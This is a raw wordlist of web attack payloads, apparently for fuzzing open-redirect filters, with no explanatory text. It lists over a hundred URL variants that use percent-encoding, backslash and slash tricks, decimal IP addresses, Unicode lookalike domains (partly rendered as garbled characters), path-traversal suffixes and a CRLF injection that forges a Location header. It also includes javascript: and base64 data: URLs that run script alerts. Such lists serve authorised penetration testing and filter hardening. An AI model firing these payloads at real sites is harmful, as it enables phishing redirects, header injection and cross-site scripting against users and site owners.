/γ€±β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
γ€±β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
$2f%2f216.58.214.206%2f%2f
$2f%2f3627734734%2f%2f
$2f%2fgoogle.com
$2f%2fgoogle.com%2f%2f
%01https://google.com
%01https://β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
/%09/β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
//%09/β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
///%09/β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
////%09/β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
&%0d%0a1Location:https://google.com
////216.58.214.206
///216.58.214.206
//216.58.214.206
/\216.58.214.206
/216.58.214.206
216.58.214.206
%2f$2f216.58.214.206
%2f$2f3627734734
%2f$2fgoogle.com
%2f216.58.214.206
%2f216.58.214.206//
%2f216.58.214.206%2f%2f
//%2f%2fgoogle.com
/%2f%2fβ“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
//%2f%2fβ“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
%2f3627734734
%2f3627734734//
%2f3627734734%2f%2f
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
%2fgoogle.com
%2fgoogle.com//
\\google.com
%2fgoogle.com%2f%2f
////3627734734
///3627734734
//3627734734
/\3627734734
/3627734734
3627734734
//google%E3%80%82com
//%2F/google.com
/%0D/google.com
/%2F/google.com
/%5Cgoogle.com
/%5cβ“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
//%5cβ“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
///%5cβ“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
////%5cβ“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
/\google%252ecom
google%252ecom
../google.com
//google%00.com
//google%E3%80%82com
.google.com
/////google.com
/////google.com/
////\;@google.com
////google.com
///;@google.com
//\/google.com/
//\google.com
/<>//google.com
/\/\/google.com/
/\/google.com
/\google.com
/google.com
google.com
//google.com/%2e%2e
/google.com/%2e%2e
//google.com/%2E%2E
//google.com/%2F.. 
/google.com/%2F.. 
//google.com//%2F%2E%2E
google.com/.jpg
http:%0a%0dgoogle.com
http:%0a%0dβ“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
http://.google.com
http://google.com
http:/\/\google.com
http:/google.com
http:google.com
/http://β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
/http:/β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
http://.β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
http://;@β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
http:/β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
http:β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
/https://%09/google.com
https://%09/β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
https://%0a%0dgoogle.com
https://%0a%0dβ“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
https%3a%2f%2fgoogle.com%2f
https:/%5cgoogle.com/
/https:/%5cβ“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/
/https://%5cβ“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
https:/%5cβ“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/
https://%5cβ“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
/https://google.com
/https://google.com//
/https:google.com
https:google.com
https://////google.com
https:/\google.com
https://google%E3%80%82com
//https://β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚//
/https://β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/
https://β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
https://β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/
https://β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚//
https:β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
//https:///β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2e%2e
/https://β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2e%2e
https:///β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2e%2e
//https://β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2e%2e%2f
https://β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2e%2e%2f
/https://β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2f..
https://β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2f..
/https:///β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2f%2e%2e
/https://β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2f%2e%2e
https:///β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2f%2e%2e
https://β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2f%2e%2e
@https://www.google.com
javascript:confirm(1)
javascript:prompt(1)
//β“π¨π—°οΏ½π•β…†π“Έβ“β‚β„Ήβ“ƒ%00ο½΅οΌ°β“¦
//β“π¨π—°οΏ½π•β…†π“Έβ“β‚β„Ήβ“ƒ%E3%80%82pw
.β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
/.β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
/////β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
/////β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/
////β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/
////β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚//
///\;@β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
///β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
///β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/
///β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚//
//;@β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
//\/β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/
//β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
//β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/
//β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚//
/\/β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/
<>//β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
@β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
\/\/β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/
////β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2e%2e
///β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2e%2e
////β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2e%2e%2f
///β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2e%2e%2f
//β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2e%2e%2f
////β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2f..
///β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2f..
//β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2f..
////β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2f%2e%2e
///β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2f%2e%2e
//β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2f%2e%2e
/β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2f%2e%2e
